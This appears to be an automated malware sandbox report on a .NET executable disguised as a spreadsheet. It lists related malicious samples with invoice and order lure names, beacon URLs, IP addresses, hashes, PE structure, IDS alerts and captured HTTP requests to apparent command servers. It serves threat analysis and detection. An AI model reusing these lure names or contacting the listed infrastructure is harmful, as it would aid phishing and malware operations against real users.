                                    • www.naturalhealthniche.com/bqt25/?mZ64L=cZV8Bf9&4huP7=ta9IUjuH/jkqTt0mr95W0Bu3u0tBN6QHWfn3pvSR9XCfTtiwEK7pWKZwma7uEInNLMp51cv9Xg==
                                    swift_copy_MT103_pdf.exeGet hashmaliciousBrowse
                                    • www.palacedepleasure.com/conv/?nvd8=EZ+lJ13FGAnW/5fWc1R3Vk6oBydKPwZ2klJ1USsSuhLU/F7acIaE/EE2v23qRSj2Xg2N&Obn=5jrtojn8AlOLE
                                    ORDER CONFIRMATION.xlsxGet hashmaliciousBrowse
                                    • www.gamemavn.com/nthe/?-Z=oN90btWhtP&bX1t=Hx1wKYvtTf7CicdeFkRXcRYNbBhZ7z+rPVWR6EKx5il05nXfihUGP/S9j6KZFO3NwyUpyg==
                                    Quotation Required Details.exeGet hashmaliciousBrowse
                                    • www.knot-tied-up.com/p4se/?l2Mdnb=HW5SeB2beplsiQFjOushPJVBWgFlKO8H2xBmZTtFyLJzSmLuJGrgc+jXOTtJCiT2smFj&fFQL=6lZPcVbxGH
                                    INVOICE.exeGet hashmaliciousBrowse
                                    • www.naturalhealthniche.com/bqt25/?W8vXg=ta9IUjuH/jkqTt0mr95W0Bu3u0tBN6QHWfn3pvSR9XCfTtiwEK7pWKZwmZXUHJL2I7Io&gDH=-ZQ0dxEX1BWLdn
                                    BORI4x10091021.exeGet hashmaliciousBrowse
                                    • www.1ms-shop.com/x9r4/?4hhDJ=nE9BXwEqXg3zScUQ3t/VTu8zJl+H6jItRWMwACM+4u1nFyTjd9+P8R2GmXJ03Ef798yW&n0=9r3p
                                    2dnXXZvWi53i69K.exeGet hashmaliciousBrowse
                                    • www.girlcastleshop.com/outf/?cB=lCMF+oJY1lgayarpdollSRr9kLxtlVnA8H/0anxfYVd2QaG0pPwNi8HCeITW+3nYS693eRQ9VA==&5je4=K2JXlfgHXLWX1v_
                                    DLT_85620000107.exeGet hashmaliciousBrowse
                                    • www.bloombathbombs.com/wdhc/?Xxlpd=Es2RL7ERFORcK7/ORN1lcxAyqHM3gPvC7jHaLqlOwhAmx55F1GI/v2+ZITGyBMe8n3Ft&t2MT=bnZP1
                                    famz6.docGet hashmaliciousBrowse
                                    • www.thebeautystopshop.com/fzsg/?DL3=SvMLQz2XqF8DGd-P&n0Gh7Vm=AvlrhsD49AGELPieEp2AfrRxPHtZKrJLP5b6kie0F37WVKMDKAZRZDUX3w0s8yxQ7unfdA==
                                    RFQ.Order 0128-44.exeGet hashmaliciousBrowse
                                    • www.naodeskin.com/5afm/?0FQ0vvt=KvWT6WqjS7x6E5Gwp6F9R8EFuVhdPJz/Pd8C09BEMn2H0abMUNkmfkLpQXjiMYcW6HLg&nP=PtUdq8l
                                    Swift $21,500.exeGet hashmaliciousBrowse
                                    • www.lushthingz.com/ssee/?r8JdTlb=53xLUBQPORqA1ypNRBpk7kI+WW7Aobf0anev/F9M5UtU2SwriWPRTdlRE4xzY+8vZdvK&4hf=4hZ0dfsHyrN4
                                    ALL REVISED_INVOICE AND PACKING LIST FOR SHIPMENT Email no. M1053 dd. Aug 26, 2021.exeGet hashmaliciousBrowse
                                    • www.sknwtr.com/uytf/?OFQPcTtx=M/gO5Yy6ncoNjDSo4pYxOTzSG6+nxjmHsBjOI5JT84t4h033jrqF/p7pPd3ShDRRhOaA&WzrxP=7nsxLJGh4
                                    Voucher.exeGet hashmaliciousBrowse
                                    • www.sknwtr.com/uytf/?lT1h2=M/gO5Yy6ncoNjDSo4pYxOTzSG6+nxjmHsBjOI5JT84t4h033jrqF/p7pPeXCuiBp/rzH&Vj=4hCdVXcX
                                    Purchase Order.exeGet hashmaliciousBrowse
                                    • www.oldsportapparel.com/bp39/?3frL=BLnaoAfDA5DbPfh00X2LxXQGh6VrvQ6zaZDV5wHSx+6LBdCA84U3qVsbVLkkYlkmnitQ&hP=y48t2bX
                                    Quotation.exeGet hashmaliciousBrowse
                                    • www.blankedlabel.com/bqt25/?s2MX98=YpqOXLU6ToBL7iRIg7c6Qfs0/47y2BcXnQtz+Z98Zgd4dGABABTUOO9dRfvN1/cY8PaB&2dcp=OfeDDbxX
                                    Purchase Order.exeGet hashmaliciousBrowse
                                    • www.badbeebox.com/owui/?cB64=zPNRK7QaIRrvu08viHG+C5+0SSwHKr6oUogMRKGgYwFS1MmEBJU5Q+3eEVngFH6+NDQj&TbTlBt=9rdp0R
                                    YAxux77Ccj.exeGet hashmaliciousBrowse
                                    • www.gogreenguardians.com/bckt/?B0=t/RMjM9LEEeCLzYjJsmNpdR0EofmutQmpXTE1tIAoaZ66uwHtR8MXCiSw8yrREysSJJV&p6t4DF=PjxX3JzHXR_
                                    Novi popis narudzbenica nalazi se u privitku.exeGet hashmaliciousBrowse
                                    • www.panache-rose.com/3nop/?8p=nDveIzuWfquLQcFvnexKgOpVu/6m89DsdcMvYWaicLM/ntU27q8ggEnjXgrHEJlZbhpWFwEZow==&r2JX4X=JN6p7hCprbg8q
                                    Proforma Invoice.pdf.exeGet hashmaliciousBrowse
                                    • www.situationslayer.com/gm9w/?sPJpgz=FBZx&5j3hLd_=IXgCdZZ3sOrOSRw75EkWTwl8ZjxWzRGyqI4lesKSg3JheeX4H8a6EO9/pFY6j824H5vVPJD8kw==
                                    RFQ_PO_009890_pdf.exeGet hashmaliciousBrowse
                                    • www.mambazonee.com/a6hg/?Gz=VX33mfZMgZAwMHhmx6/qtzxSoTo7y4yEDVWvkahGv/aVo1L6Gd2NzoA4meLyxX9zeoKCdno/Ew==&-ZsLG=3ff8xpG0DPWtZdZ

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    shops.myshopify.comUPDATED e-STATEMENT.exeGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    swift_copy_MT103_pdf.exeGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    ORDER CONFIRMATION.xlsxGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    Quotation Required Details.exeGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    INVOICE.exeGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    BORI4x10091021.exeGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    2dnXXZvWi53i69K.exeGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    DLT_85620000107.exeGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    famz6.docGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    RFQ.Order 0128-44.exeGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    Swift $21,500.exeGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    ALL REVISED_INVOICE AND PACKING LIST FOR SHIPMENT Email no. M1053 dd. Aug 26, 2021.exeGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    Voucher.exeGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    Purchase Order.exeGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    Quotation.exeGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    Purchase Order.exeGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    Production Inquiry.xlsxGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    YAxux77Ccj.exeGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    Novi popis narudzbenica nalazi se u privitku.exeGet hashmaliciousBrowse
                                    • 23.227.38.74
                                    Proforma Invoice.pdf.exeGet hashmaliciousBrowse
                                    • 23.227.38.74

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    CLOUDFLARENETUSscan files 15-9-21.exeGet hashmaliciousBrowse
                                    • 172.67.196.84
                                    AP Remittance for michelle.looi@globalfoundries.com .htmlGet hashmaliciousBrowse
                                    • 104.18.11.207
                                    86jLEXtwqR.exeGet hashmaliciousBrowse
                                    • 162.159.134.233
                                    6WtKevhqlg.exeGet hashmaliciousBrowse
                                    • 162.159.134.233
                                    oLn3NAKPzu.exeGet hashmaliciousBrowse
                                    • 162.159.134.233
                                    hd9uHo4dot.exeGet hashmaliciousBrowse
                                    • 162.159.134.233
                                    47U9eIz5bG.exeGet hashmaliciousBrowse
                                    • 162.159.135.233
                                    x13NYP60fd.exeGet hashmaliciousBrowse
                                    • 162.159.130.233
                                    ivR7bfFqYWqLlce.exeGet hashmaliciousBrowse
                                    • 172.67.188.154
                                    PO7420.exeGet hashmaliciousBrowse
                                    • 23.227.38.65
                                    #Ud83d#Udd09_ 3pm.htmlGet hashmaliciousBrowse
                                    • 104.16.18.94
                                    MktxljHVy8.exeGet hashmaliciousBrowse
                                    • 104.21.33.32
                                    Elon Musk Club - 024705 .htmGet hashmaliciousBrowse
                                    • 104.18.11.207
                                    N3sJiiIQAP.exeGet hashmaliciousBrowse
                                    • 104.21.79.144
                                    4478884ce2cf578bf0a0d2484fc8221e5ff63d7cbc73d5200bacbd6e2796e017.exeGet hashmaliciousBrowse
                                    • 162.159.133.233
                                    aZq3gco8Ab.exeGet hashmaliciousBrowse
                                    • 104.18.7.156
                                    Medical-Engagement-Scale-Questionnaire.msiGet hashmaliciousBrowse
                                    • 104.16.119.102
                                    XbvAoRKnFm.exeGet hashmaliciousBrowse
                                    • 104.21.30.211
                                    PO12031.exeGet hashmaliciousBrowse
                                    • 172.67.188.154
                                    m3maOnY6Uy.exeGet hashmaliciousBrowse
                                    • 172.67.193.227

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PI L032452021xxls.exe.log
                                    Process:C:\Users\user\Desktop\PI L032452021xxls.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1216
                                    Entropy (8bit):5.355304211458859
                                    Encrypted:false
                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                    MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                    SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                    SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                    SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                    Malicious:true
                                    Reputation:high, very likely benign file
                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.483820848946672
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    File name:PI L032452021xxls.exe
                                    File size:722944
                                    MD5:73c7fda15888b3b6cc025ce3d5f83161
                                    SHA1:78b8467853dc5bdba4dd28a8602902fcc210f67c
                                    SHA256:69394a249833f97289151fa8334f32e0b0467ce4ecb164b0706784fb836136a6
                                    SHA512:dbb943a00e2c24dc0926f36b81409d28789a10d20b8e4043b2545eff1daa74448bc324ada5376e582757ce3db916042747b7939648d8ed102fe2be305ffe872a
                                    SSDEEP:12288:2UWHCM2K4CtI/yzQs2TaIpImC+VkiQ2n75/pIo3270cztgbcoN+1GrI:203CSMIpIPkt7NKo3UztgbzI
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.Aa..............0......n........... ........@.. .......................`............@................................

                                    File Icon

                                    Icon Hash:f1f0f4d0eecccc71

                                    Static PE Info

                                    General

                                    Entrypoint:0x4ab6ae
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x61419258 [Wed Sep 15 06:27:36 2021 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:v4.0.30319
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xab65c0x4f.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000x6b78.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xb40000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000xa96b40xa9800False0.82795791851data7.55314321358IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rsrc0xac0000x6b780x6c00False0.442563657407data5.09054449888IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0xb40000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    RT_ICON0xac2000x668data
                                    RT_ICON0xac8780x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 1953594267, next used block 28725
                                    RT_ICON0xacb700x128GLS_BINARY_LSB_FIRST
                                    RT_ICON0xacca80xea8data
                                    RT_ICON0xadb600x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                    RT_ICON0xae4180x568GLS_BINARY_LSB_FIRST
                                    RT_ICON0xae9900x25a8data
                                    RT_ICON0xb0f480x10a8data
                                    RT_ICON0xb20000x468GLS_BINARY_LSB_FIRST
                                    RT_GROUP_ICON0xb24780x84data
                                    RT_VERSION0xb250c0x46cdata
                                    RT_MANIFEST0xb29880x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Version Infos

                                    DescriptionData
                                    Translation0x0000 0x04b0
                                    LegalCopyrightCopyright 2008 - 2010
                                    Assembly Version1.3.0.0
                                    InternalNameRefFla.exe
                                    FileVersion1.3.0.0
                                    CompanyNameWHC
                                    LegalTrademarks
                                    CommentsA little Tool where you can check the stats of your RYL - Risk Your Life - characters. Ruins of War version.
                                    ProductNameRYL Character Tool - RoW EU version
                                    ProductVersion1.3.0.0
                                    FileDescriptionRYL Character Tool - RoW EU version
                                    OriginalFilenameRefFla.exe

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    09/15/21-09:41:30.075273TCP1201ATTACK-RESPONSES 403 Forbidden804981899.83.154.118192.168.2.6
                                    09/15/21-09:41:50.538756TCP1201ATTACK-RESPONSES 403 Forbidden804981923.227.38.74192.168.2.6

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 15, 2021 09:41:29.896289110 CEST4981880192.168.2.699.83.154.118
                                    Sep 15, 2021 09:41:29.915252924 CEST804981899.83.154.118192.168.2.6
                                    Sep 15, 2021 09:41:29.915457964 CEST4981880192.168.2.699.83.154.118
                                    Sep 15, 2021 09:41:29.915740967 CEST4981880192.168.2.699.83.154.118
                                    Sep 15, 2021 09:41:29.934689045 CEST804981899.83.154.118192.168.2.6
                                    Sep 15, 2021 09:41:30.075273037 CEST804981899.83.154.118192.168.2.6
                                    Sep 15, 2021 09:41:30.075308084 CEST804981899.83.154.118192.168.2.6
                                    Sep 15, 2021 09:41:30.075588942 CEST4981880192.168.2.699.83.154.118
                                    Sep 15, 2021 09:41:30.075757027 CEST4981880192.168.2.699.83.154.118
                                    Sep 15, 2021 09:41:30.094223022 CEST804981899.83.154.118192.168.2.6
                                    Sep 15, 2021 09:41:50.469965935 CEST4981980192.168.2.623.227.38.74
                                    Sep 15, 2021 09:41:50.489254951 CEST804981923.227.38.74192.168.2.6
                                    Sep 15, 2021 09:41:50.489449024 CEST4981980192.168.2.623.227.38.74
                                    Sep 15, 2021 09:41:50.489600897 CEST4981980192.168.2.623.227.38.74
                                    Sep 15, 2021 09:41:50.508296013 CEST804981923.227.38.74192.168.2.6
                                    Sep 15, 2021 09:41:50.538755894 CEST804981923.227.38.74192.168.2.6
                                    Sep 15, 2021 09:41:50.538785934 CEST804981923.227.38.74192.168.2.6
                                    Sep 15, 2021 09:41:50.538801908 CEST804981923.227.38.74192.168.2.6
                                    Sep 15, 2021 09:41:50.538820982 CEST804981923.227.38.74192.168.2.6
                                    Sep 15, 2021 09:41:50.538837910 CEST804981923.227.38.74192.168.2.6
                                    Sep 15, 2021 09:41:50.538846016 CEST804981923.227.38.74192.168.2.6
                                    Sep 15, 2021 09:41:50.538858891 CEST804981923.227.38.74192.168.2.6
                                    Sep 15, 2021 09:41:50.539170027 CEST4981980192.168.2.623.227.38.74
                                    Sep 15, 2021 09:41:50.539241076 CEST4981980192.168.2.623.227.38.74

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 15, 2021 09:39:40.047617912 CEST6426753192.168.2.68.8.8.8
                                    Sep 15, 2021 09:39:40.074218988 CEST53642678.8.8.8192.168.2.6
                                    Sep 15, 2021 09:40:10.982320070 CEST4944853192.168.2.68.8.8.8
                                    Sep 15, 2021 09:40:11.018699884 CEST53494488.8.8.8192.168.2.6
                                    Sep 15, 2021 09:40:32.225110054 CEST6034253192.168.2.68.8.8.8
                                    Sep 15, 2021 09:40:32.274924040 CEST53603428.8.8.8192.168.2.6
                                    Sep 15, 2021 09:40:34.209939957 CEST6134653192.168.2.68.8.8.8
                                    Sep 15, 2021 09:40:34.240824938 CEST53613468.8.8.8192.168.2.6
                                    Sep 15, 2021 09:40:34.746603966 CEST5177453192.168.2.68.8.8.8
                                    Sep 15, 2021 09:40:34.775337934 CEST53517748.8.8.8192.168.2.6
                                    Sep 15, 2021 09:40:35.480587959 CEST5602353192.168.2.68.8.8.8
                                    Sep 15, 2021 09:40:35.508222103 CEST53560238.8.8.8192.168.2.6
                                    Sep 15, 2021 09:40:35.908457994 CEST5838453192.168.2.68.8.8.8
                                    Sep 15, 2021 09:40:35.940692902 CEST53583848.8.8.8192.168.2.6
                                    Sep 15, 2021 09:40:36.001034021 CEST6026153192.168.2.68.8.8.8
                                    Sep 15, 2021 09:40:36.046149969 CEST53602618.8.8.8192.168.2.6
                                    Sep 15, 2021 09:40:36.499110937 CEST5606153192.168.2.68.8.8.8
                                    Sep 15, 2021 09:40:36.525995970 CEST53560618.8.8.8192.168.2.6
                                    Sep 15, 2021 09:40:37.226656914 CEST5833653192.168.2.68.8.8.8
                                    Sep 15, 2021 09:40:37.256403923 CEST53583368.8.8.8192.168.2.6
                                    Sep 15, 2021 09:40:37.979178905 CEST5378153192.168.2.68.8.8.8
                                    Sep 15, 2021 09:40:38.017796993 CEST53537818.8.8.8192.168.2.6
                                    Sep 15, 2021 09:40:39.662111044 CEST5406453192.168.2.68.8.8.8
                                    Sep 15, 2021 09:40:39.689955950 CEST53540648.8.8.8192.168.2.6
                                    Sep 15, 2021 09:40:40.609512091 CEST5281153192.168.2.68.8.8.8
                                    Sep 15, 2021 09:40:40.664896011 CEST53528118.8.8.8192.168.2.6
                                    Sep 15, 2021 09:40:41.178097963 CEST5529953192.168.2.68.8.8.8
                                    Sep 15, 2021 09:40:41.210659981 CEST53552998.8.8.8192.168.2.6
                                    Sep 15, 2021 09:41:00.545372963 CEST6374553192.168.2.68.8.8.8
                                    Sep 15, 2021 09:41:00.585246086 CEST53637458.8.8.8192.168.2.6
                                    Sep 15, 2021 09:41:07.088540077 CEST5005553192.168.2.68.8.8.8
                                    Sep 15, 2021 09:41:07.128113985 CEST53500558.8.8.8192.168.2.6
                                    Sep 15, 2021 09:41:24.047225952 CEST6137453192.168.2.68.8.8.8
                                    Sep 15, 2021 09:41:24.080379009 CEST53613748.8.8.8192.168.2.6
                                    Sep 15, 2021 09:41:26.137214899 CEST5033953192.168.2.68.8.8.8
                                    Sep 15, 2021 09:41:26.180830002 CEST53503398.8.8.8192.168.2.6
                                    Sep 15, 2021 09:41:29.832505941 CEST6330753192.168.2.68.8.8.8
                                    Sep 15, 2021 09:41:29.887106895 CEST53633078.8.8.8192.168.2.6
                                    Sep 15, 2021 09:41:50.394893885 CEST4969453192.168.2.68.8.8.8
                                    Sep 15, 2021 09:41:50.468105078 CEST53496948.8.8.8192.168.2.6

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Sep 15, 2021 09:41:29.832505941 CEST192.168.2.68.8.8.80xa013Standard query (0)www.vdvppt.clubA (IP address)IN (0x0001)
                                    Sep 15, 2021 09:41:50.394893885 CEST192.168.2.68.8.8.80x613cStandard query (0)www.karnez.netA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Sep 15, 2021 09:41:29.887106895 CEST8.8.8.8192.168.2.60xa013No error (0)www.vdvppt.club99.83.154.118A (IP address)IN (0x0001)
                                    Sep 15, 2021 09:41:50.468105078 CEST8.8.8.8192.168.2.60x613cNo error (0)www.karnez.netshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                    Sep 15, 2021 09:41:50.468105078 CEST8.8.8.8192.168.2.60x613cNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • www.vdvppt.club
                                    • www.karnez.net

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.64981899.83.154.11880C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 15, 2021 09:41:29.915740967 CEST5480OUTGET /ergs/?rt=jBPLMP3h1LcdC&J8uTkT=JWbjbWIzi5Xd8qR/4tQdqrKkFdlvhz2KwPZGVEcCMD5MfsK3CM+df9zTKLP63o3kNg3XOCoErQ== HTTP/1.1
                                    Host: www.vdvppt.club
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 15, 2021 09:41:30.075273037 CEST5480INHTTP/1.1 403 Forbidden
                                    Date: Wed, 15 Sep 2021 07:41:30 GMT
                                    Content-Type: text/html
                                    Content-Length: 146
                                    Connection: close
                                    Server: nginx
                                    Vary: Accept-Encoding
                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.64981923.227.38.7480C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Sep 15, 2021 09:41:50.489600897 CEST5482OUTGET /ergs/?J8uTkT=c9bkYQKJ+lNI6VVZ5eI1zueoz+82ajOViy0Ll3ZdIgo7PyasuomRPuIVCCVSa7haztcFmZ8CSw==&rt=jBPLMP3h1LcdC HTTP/1.1
                                    Host: www.karnez.net
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 15, 2021 09:41:50.538755894 CEST5483INHTTP/1.1 403 Forbidden
                                    Date: Wed, 15 Sep 2021 07:41:50 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    X-Sorting-Hat-PodId: 191
                                    X-Sorting-Hat-ShopId: 26798489792
                                    X-Request-ID: 52ed9677-9dcc-4ed6-847a-c204774b908d
